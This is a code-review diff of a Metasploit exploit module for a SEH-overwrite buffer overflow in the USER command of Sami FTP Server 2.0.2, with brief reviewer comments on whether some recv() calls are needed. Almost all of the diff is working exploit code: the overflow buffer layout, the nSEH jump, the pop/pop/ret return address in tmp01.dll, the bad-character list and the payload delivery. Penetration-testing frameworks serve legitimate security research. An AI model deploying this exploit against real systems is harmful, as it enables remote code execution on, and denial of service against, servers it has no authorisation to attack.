modules/exploits/windows/ftp/sami_ftpd_user.rb

```diff
@@ -8,84 +8,124 @@ class MetasploitModule < Msf::Exploit::Remote
-          [ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll
+        'Author'	=> [
+          'Muhammad Ahmed Siddiqui', # Discovery
+          'Critical Security', # Perl exploit
+          'n30m1nd', # Python exploit - SEH overwrite with 2.0.2 universal tmp01.dll p/p/r
+          'aushack', # Metasploit
+          'bcoles' # Metasploit
         ],
-      'DisclosureDate' => '2006-01-24'))
+        'Arch'	=> [ ARCH_X86 ],
+        'License'	=> MSF_LICENSE,
+        'References'	=>
+          [
+            # This vulnerability appears to have been reported multiple times.
+            ['CVE', '2006-0441'],
+            ['CVE', '2006-2212'],
+            ['OSVDB', '25670'],
+            ['BID', '16370'],
+            ['BID', '22045'],
+            ['BID', '17835'],
+            ['EDB', '1448'],
+            ['EDB', '1452'],
+            ['EDB', '1462'],
+            ['EDB', '3127'],
+            ['EDB', '3140'],
+            ['EDB', '40675']
+          ],
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'seh'
+          },
+        'Platform' => ['win'],
+        'Privileged' => false,
+        'Payload'	=>
+          {
+            'Space'	=> 800,
+            'BadChars' => "\x00\x0a\x0d\x20\xff",
+            'EncoderType' => Msf::Encoder::Type::AlphanumMixed
+          },
+        'Targets' =>
+          [
+            ['Sami FTP Server version 2.0.2', { 'Ret' => 0x10022ADE }], # p/p/r tmp01.dll
+          ],
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ]
+        },
+        'DisclosureDate' => '2006-01-24'
+      )
+    )
 
-    register_options(
-      [
-        Opt::RPORT(21),
-      ])
+    register_options([
+      Opt::RPORT(21)
+    ])
   end
 
   def check
     connect
     banner = sock.get_once(-1, 3)
     disconnect
 
-    if (banner =~ /Sami FTP Server 2\.0\.2/)
-      return Exploit::CheckCode::Appears
+    unless banner.include?('Sami FTP Server')
+      return CheckCode::Safe('Target is not Sami FTP Server')
+    end
+
+    if banner.include?('Sami FTP Server 2.0.2')
+      return CheckCode::Appears('Sami FTP Server version 2.0.2.')
     end
-    return Exploit::CheckCode::Safe
+
+    CheckCode::Detected
   end
 
   def exploit
     connect
 
-    sploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret)
+    nseh = "\xeb\x06"
+    nseh << rand_text_alpha(2)
+    seh = [target.ret].pack('V')
+
+    user = rand_text_alpha(596)
+    user << nseh
+    user << seh
+    user << "\x90" * 10
+    user << payload.encoded
+    user << "\x90" * (800 - payload.encoded.length)
 
-    login = "USER #{sploit}\r\n"
-    login << "PASS " + Rex::Text.rand_char(payload_badchars)
+    print_status("Sending payload (#{user.length} bytes) ...")
+    sock.put("USER #{user}\r\n")
+    sock.recv(4096)
 
-    sock.put(login + "\r\n")
+    sock.put("PASS #{Rex::Text.rand_char(payload_badchars)}\r\n")
+    sock.recv(4096)
+    sock.recv(4096)
```

Comment:
Is this second `recv()` call needed?

Reply:
Hmm this still worked without this `recv()` in my tests.

Reply:
Neither of the `recv()` are required.